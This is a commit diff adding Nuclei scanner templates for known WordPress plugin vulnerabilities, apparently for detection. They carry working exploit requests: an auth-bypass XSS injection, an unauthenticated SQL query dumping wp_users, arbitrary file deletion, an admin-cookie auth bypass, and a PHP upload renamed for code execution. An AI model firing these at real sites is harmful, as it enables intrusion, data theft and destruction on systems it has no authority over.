commit
40736bbead
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2018-3810
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Smart Google Code Inserter Authentication Bypass
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://www.exploit-db.com/exploits/43420
|
||||||
|
tags: wordpress,auth-bypass,cve,cve2018
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
|
||||||
|
|
||||||
|
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-14092
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://wpscan.com/vulnerability/10287
|
||||||
|
tags: cve,cve2020,wordpress,wp-plugin,sqli
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"user_login"'
|
||||||
|
- '"user_email"'
|
||||||
|
- '"user_pass"'
|
||||||
|
- '"user_activation_key"'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,79 @@
|
||||||
|
id: CVE-2020-35951
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Quiz and Survey Master Arbitrary File Deletion
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
|
||||||
|
tags: cve,cve2020,wordpress,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 269
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
------WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
qsm_remove_file_fd_question
|
||||||
|
------WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||||
|
Content-Disposition: form-data; name="file_url"
|
||||||
|
|
||||||
|
{{fullpath}}wp-content/plugins/quiz-master-next/README.md
|
||||||
|
------WebKitFormBoundaryBJ17hSJBjuGrnW92--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: fullpath
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "not found in <b>([/a-z_]+)wp"
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '{"type":"success","message":"File removed successfully"}'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"
|
|
@ -26,7 +26,6 @@ requests:
|
||||||
- '{{BaseURL}}/wp-config.php~'
|
- '{{BaseURL}}/wp-config.php~'
|
||||||
- '{{BaseURL}}/wp-config.php.orig'
|
- '{{BaseURL}}/wp-config.php.orig'
|
||||||
- '{{BaseURL}}/wp-config.php.original'
|
- '{{BaseURL}}/wp-config.php.original'
|
||||||
- '{{BaseURL}}/wp-license.php?file=../..//wp-config'
|
|
||||||
- '{{BaseURL}}/_wpeprivate/config.json'
|
- '{{BaseURL}}/_wpeprivate/config.json'
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: wordpress-auth-bypass-wptimecapsule
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress WP Time Capsule Authentication Bypass
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
|
||||||
|
tags: wordpress,auth-bypass,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
IWP_JSON_PREFIX
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/index.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
|
||||||
|
- "<h1>Dashboard</h1>"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
|
|
@ -0,0 +1,74 @@
|
||||||
|
id: wordpress-rce-simplefilelist
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://wpscan.com/vulnerability/10192
|
||||||
|
tags: wordpress,wp-plugin,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
Content-Length: 693
|
||||||
|
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_ID"
|
||||||
|
|
||||||
|
1
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
|
||||||
|
|
||||||
|
/wp-content/uploads/simple-file-list/
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_Timestamp"
|
||||||
|
|
||||||
|
1587258885
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_Token"
|
||||||
|
|
||||||
|
ba288252629a5399759b6fde1e205bc2
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="file"; filename="nuclei.png"
|
||||||
|
Content-Type: image/png
|
||||||
|
|
||||||
|
<?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2--
|
||||||
|
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: python-requests/2.25.1
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 81
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
|
||||||
|
part: body
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
part: header
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: wordpress-total-upkeep-backup-download
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Total Upkeep Database and Files Backup Download
|
||||||
|
author: princechaddha
|
||||||
|
severity: high
|
||||||
|
reference: https://www.exploit-db.com/exploits/49252
|
||||||
|
tags: wordpress,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"filepath"'
|
||||||
|
- '/wp-content/boldgrid_backup_'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,15 +5,13 @@ info:
|
||||||
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
|
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
|
||||||
tags: workflow
|
tags: workflow
|
||||||
|
|
||||||
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
|
|
||||||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
|
||||||
|
|
||||||
workflows:
|
workflows:
|
||||||
|
|
||||||
- template: technologies/tech-detect.yaml
|
- template: technologies/tech-detect.yaml
|
||||||
matchers:
|
matchers:
|
||||||
- name: wordpress
|
- name: wordpress
|
||||||
subtemplates:
|
subtemplates:
|
||||||
|
- template: cves/2018/CVE-2018-3810.yaml
|
||||||
- template: cves/2019/CVE-2019-6112.yaml
|
- template: cves/2019/CVE-2019-6112.yaml
|
||||||
- template: cves/2019/CVE-2019-6715.yaml
|
- template: cves/2019/CVE-2019-6715.yaml
|
||||||
- template: cves/2019/CVE-2019-9978.yaml
|
- template: cves/2019/CVE-2019-9978.yaml
|
||||||
|
@ -25,6 +23,11 @@ workflows:
|
||||||
- template: cves/2020/CVE-2020-24312.yaml
|
- template: cves/2020/CVE-2020-24312.yaml
|
||||||
- template: cves/2020/CVE-2020-25213.yaml
|
- template: cves/2020/CVE-2020-25213.yaml
|
||||||
- template: cves/2020/CVE-2020-13700.yaml
|
- template: cves/2020/CVE-2020-13700.yaml
|
||||||
|
- template: cves/2020/CVE-2020-14092.yaml
|
||||||
|
- template: cves/2020/CVE-2020-35951.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
|
||||||
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
|
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
|
||||||
- template: vulnerabilities/wordpress/sassy-social-share.yaml
|
- template: vulnerabilities/wordpress/sassy-social-share.yaml
|
||||||
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
|
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
|
||||||
|
|
Loading…
Reference in New Issue